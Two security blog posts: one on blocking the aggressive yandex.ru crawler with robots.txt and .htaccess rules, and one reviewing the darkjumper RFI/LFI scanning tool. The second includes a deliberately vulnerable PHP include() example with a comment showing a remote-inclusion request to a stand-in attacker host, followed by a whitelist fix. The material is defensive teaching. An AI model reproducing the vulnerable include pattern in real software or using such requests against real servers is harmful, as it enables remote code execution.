Yandex.ru Indexing Crawler Issues

The yandex.ru crawler is an indexing application that spiders hosts and puts the results into the yandex.ru search engine. Like Google, Bing and other search engines, the system continually searches out new content on the web and adds it to the search engine database. Usually, these activities cause few issues for the sites being indexed, and in fact, over the years an etiquette system has emerged, based on rules placed in a web site's robots.txt file.

Robots.txt files provide a rule set for search engine behavior. They indicate which areas of a site a crawler may index and which sections are to be avoided. Usually this is used to protect overly dynamic areas of a site, where a crawler could encounter a variety of problems or inputs that cause bandwidth or application issues for the crawler, the web host or both.
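For example, a minimal robots.txt that steers crawlers away from a site's dynamic areas might look like the following (the paths here are illustrative, not from any real site):

    User-agent: *
    Disallow: /cgi-bin/
    Disallow: /search/
    Crawl-delay: 10

The User-agent line says which crawlers the rules apply to, the Disallow lines mark off-limits paths, and Crawl-delay (honored by some engines, Yandex among them) asks the crawler to pause between requests.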

Sadly, many web crawlers and index bots do not honor the rules of robots.txt. Neither do attackers who index your site in preparation for a variety of attacks. Given the impact that some of these indexing tools can have on bandwidth, CPU use or database connectivity, other options for blocking them are sometimes sought. In particular, there are a lot of complaints about yandex.ru and its aggressive parsing, application interaction and deep site inspection techniques. It has been widely identified as a search engine that does not respect the honor system of robots.txt. A Google search for “yandex.ru ignores robots.txt” will show you a wide variety of complaints.

In our monitoring of the HITME traffic, we have observed many deep crawls by yandex.ru from a variety of IP ranges. In the majority of them, the crawler either never requested the robots.txt file at all or simply ignored its contents. In fact, some of our HITME web applications have experienced the same high traffic costs that other parts of the web community have been complaining about. In a couple of cases, the cost of supporting yandex.ru's scans represents some 30+% of the total web traffic observed by the HITME end point. From our standpoint, that's a pain in the pocketbook and in our attention span, since we must continually parse their alert traffic out of our metrics.

Techniques for blocking yandex.ru more forcibly than robots.txt have emerged. You can learn about some of them by searching “blocking yandex.ru”. The easiest approach, and one that has proven effective, is to use .htaccess rules. We've also had some more modest success with forcibly returning redirects to requests that carry URL parameters known to be associated with yandex.ru, along with some level of success blocking specific IPs associated with the crawler via an ignore rule in HoneyPoint.
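As a minimal sketch of the .htaccess approach (assuming mod_rewrite is enabled), the following rules return a 403 Forbidden to any request whose User-Agent header contains “Yandex”; the pattern is an assumption on our part, so tune it to the user-agent strings you actually see in your logs:

    # Refuse requests that identify themselves as the Yandex crawler
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} Yandex [NC]
    RewriteRule .* - [F,L]

Keep in mind that user-agent strings are trivially spoofed, so pairing rules like these with IP-based blocking gives better coverage.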

If you are battling yandex.ru crawling and want to get some additional help, drop us a comment or get in touch via Twitter (@lbhuston, @microsolved). You can also give an account representative a call to arrange for a more technical discussion. We hope this post helps some folks who are suffering increased bandwidth use or problems with their sites/apps due to this and other indexing crawler issues. Until next time, stay safe out there!

Review of darkjumper v5.7

In continuing our research and experimentation with PHP and the threat of Remote File Inclusion (RFI), our team has been seeking out and testing various tools that have been made available to help identify web sites vulnerable to RFI during our penetration tests. Because we're constantly finding more tools to add to the list, we've started the evaluation this week with the release of darkjumper v5.7. This Python tool prides itself on being cross platform, and at first glance it seems rather easy to use. After downloading the tarball and extracting the files, simply calling the script from the command line brings it to life.

Running it again with the --help or -h switch will print the options menu. The tool has several options that could help expedite the discovery of various attack vectors against a web site. The injection switch launches a full barrage of SQLi and blind SQLi attempts against every web site identified on the target server. We did not use this option for this evaluation but intend to test it thoroughly in the future.
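For reference, pulling up that help output looks something like this (we're assuming the extracted script is named darkjumper.py; check your tarball for the actual file name):

    python darkjumper.py --help

The exact names of the injection, inclusion and full switches are listed in that output.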

Using the inclusion switch will test for both local file inclusion (LFI) and RFI, again against every web site identified on the target. This is our main focus for the evaluation, since we've seen an incredible number of RFI attacks in the recent HITME data from around the globe. Selecting the full switch will attack the target server with the previously mentioned checks, in addition to scanning cgi directories, enumerating users, port scanning, header snatching, and several other possibly useful options. While a full review of this tool will be written eventually, we're focusing on the RFI capabilities this time, so we're running this test only against our test target. The test appears quite comprehensive. Another seemingly useful function of the tool is its ability to discover virtual hosts that live on the target server. After a short wait, darkjumper works its magic and spits out several files with various information for us to review. After poring through these files, our team was disappointed to realize that there were URLs pointing to this server that the tool's scans seem to have missed. Even more disappointing is the fact that of the 12 target sites identified by the tool, none were the target we had suspected of being vulnerable to RFI.

File inclusion is a real threat in the wild today. We are seeing newly vulnerable and compromised hosts in the HITME data on a regular basis, and the fact that Apache ships with a default configuration vulnerable to these attacks, combined with PHP's inherently insecure defaults, makes the battle even more intense. In this environment, it is absolutely critical that we harden our servers before bringing them online, and that those of us developing web applications validate every bit of information submitted to us by our users. Allowing our servers to execute code from an unknown source is at the heart of some of today's most popular attack vectors, from SQL injection, to XSS and XSRF, to RFI. The Internet continues to be a digital equivalent of the wild, wild west, where outlaws abound. There is no guarantee that the users who interface with our sites are who they say they are, or that they have the best of intentions. It is up to us to control how our applications and servers handle this data.
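To make the RFI pattern concrete, here is a minimal sketch in PHP. The parameter and file names are invented for illustration, but the vulnerable form is the classic one that darkjumper and similar tools hunt for:

    <?php
    // VULNERABLE: attacker-controlled input reaches include() directly.
    // A request like page.php?p=http://evil.example/shell.txt can cause
    // the server to fetch and execute remote code (when allow_url_include
    // is enabled) or expose local files (LFI).
    include($_GET['p']);
    ?>

One common way to close the hole is to map user input onto a whitelist of known pages, so no raw input ever reaches include():

    <?php
    // Safer: only values we explicitly allow are ever included.
    $pages = array('home' => 'home.php', 'about' => 'about.php');
    $key = isset($_GET['p']) ? $_GET['p'] : 'home';
    include(isset($pages[$key]) ? $pages[$key] : 'home.php');
    ?>

Disabling allow_url_include (and, where possible, allow_url_fopen) in php.ini removes the remote half of the attack entirely.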